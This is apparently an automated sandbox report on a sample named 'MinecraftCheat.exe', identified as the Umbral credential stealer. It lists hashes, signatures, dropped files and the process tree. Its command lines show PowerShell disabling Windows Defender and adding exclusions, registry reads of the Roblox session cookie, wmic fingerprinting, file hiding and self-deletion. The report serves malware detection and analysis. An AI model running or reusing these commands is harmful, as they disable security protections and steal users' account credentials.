Overview

overview

10

Static

static

10

MinecraftCheat.exe

windows7-x64

10

MinecraftCheat.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-06-2024 10:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    MinecraftCheat.exe

  • Size

    231KB

  • MD5

    20384d9a8661d8d1c6baeba964939ba0

  • SHA1

    e44f61df3bc54d183d673235b29cf1669c978dcc

  • SHA256

    8615172da6f2114f1a7b0b41050f6a3556b725d5f8aec82cc4558504137e4299

  • SHA512

    4384c8c5b05ca17191c5c3636808adc84ede226dd56c15fed4127aea830d141f920079a3e3fef6bca688911ca0185336cdf327bbbed57f8f311162a83032e578

  • SSDEEP

    6144:RloZM9rIkd8g+EtXHkv/iD4fNPjpaC9Hop7mGzY8vI8e1m1Ji:joZOL+EP8fNPjpaC9Hop7mGzgqQ

Score
10/10
umbralexecutionspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\MinecraftCheat.exe
    "C:\Users\Admin\AppData\Local\Temp\MinecraftCheat.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3488
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\MinecraftCheat.exe"
      2⤵
      • Views/modifies file attributes
      PID:2576
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\MinecraftCheat.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4168
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1648
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2676
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3896
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2572
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4564
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
        PID:4056
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:4600
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        2⤵
        • Detects videocard installed
        PID:2000
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\MinecraftCheat.exe" && pause
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3528
        • C:\Windows\system32\PING.EXE
          ping localhost
          3⤵
          • Runs ping.exe
          PID:3196
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4148 --field-trial-handle=2180,i,12780723798465539942,12010519452607841069,262144 --variations-seed-version /prefetch:8
      1⤵
        PID:4172

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        62623d22bd9e037191765d5083ce16a3

        SHA1

        4a07da6872672f715a4780513d95ed8ddeefd259

        SHA256

        95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

        SHA512

        9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        948B

        MD5

        90c8020d02ac4b157ec228af068b9b3c

        SHA1

        f445e6cd6ba0aa9cd74c475a36101398e2096ba9

        SHA256

        f395f437592cbe83eae9afbfd6c12075cd9137c659fa876f587953a55f88c00d

        SHA512

        282cb07e02cee820046960e06e49e99af7399bd89506c4b6355edce39ba44e72eb553b4ad96a1f544ac70345c9e1800df9a517a6551ba36cf6801b26a4e33914

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        227556da5e65f6819f477756808c17e4

        SHA1

        6ffce766e881ca2a60180bb25f4981b183f78279

        SHA256

        101f5fe8a4192f14e9f0a12c105ca81c9f176860930af44747185dd1bedb59a4

        SHA512

        d46b935809d2c4b7a041ad790f2db11c0a808df022c91ae9152b8769021b884fde49653a7a46557ef9ee65e274fe0b6c8503df9b50e6b3b849fefacf51f8bd6a

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        d335b933fd5902cc5d6e6f5cfae33b57

        SHA1

        30511e75e9f4d4b09ddbeb2b6adeb5cd89defd87

        SHA256

        c1e38b772837438d10218009be55d7b2098daa5ba708708836f56a7e99024dc1

        SHA512

        4839b6be9877bb1a64d387df0f93b40859e48a5b6e7d2fb5fd92a057b1973916b93727b4dca9f1819038da65fd4548afb7f0c414a82e388e714dde6e6ccb4266

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yusc0ngd.opt.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • memory/3488-0-0x00007FFAE3683000-0x00007FFAE3685000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3488-37-0x000002EF2C4F0000-0x000002EF2C50E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/3488-71-0x000002EF2C740000-0x000002EF2C752000-memory.dmp

        Filesize

        72KB

        Download

      • memory/3488-70-0x000002EF2C520000-0x000002EF2C52A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/3488-89-0x00007FFAE3680000-0x00007FFAE4141000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3488-2-0x00007FFAE3680000-0x00007FFAE4141000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3488-1-0x000002EF11E30000-0x000002EF11E70000-memory.dmp

        Filesize

        256KB

        Download

      • memory/3488-35-0x000002EF2C560000-0x000002EF2C5D6000-memory.dmp

        Filesize

        472KB

        Download

      • memory/3488-36-0x000002EF2C5E0000-0x000002EF2C630000-memory.dmp

        Filesize

        320KB

        Download

      • memory/4168-13-0x00007FFAE3680000-0x00007FFAE4141000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4168-20-0x00007FFAE3680000-0x00007FFAE4141000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4168-17-0x00007FFAE3680000-0x00007FFAE4141000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4168-16-0x00007FFAE3680000-0x00007FFAE4141000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4168-15-0x00007FFAE3680000-0x00007FFAE4141000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4168-14-0x00007FFAE3680000-0x00007FFAE4141000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4168-9-0x00000222782B0000-0x00000222782D2000-memory.dmp

        Filesize

        136KB

        Download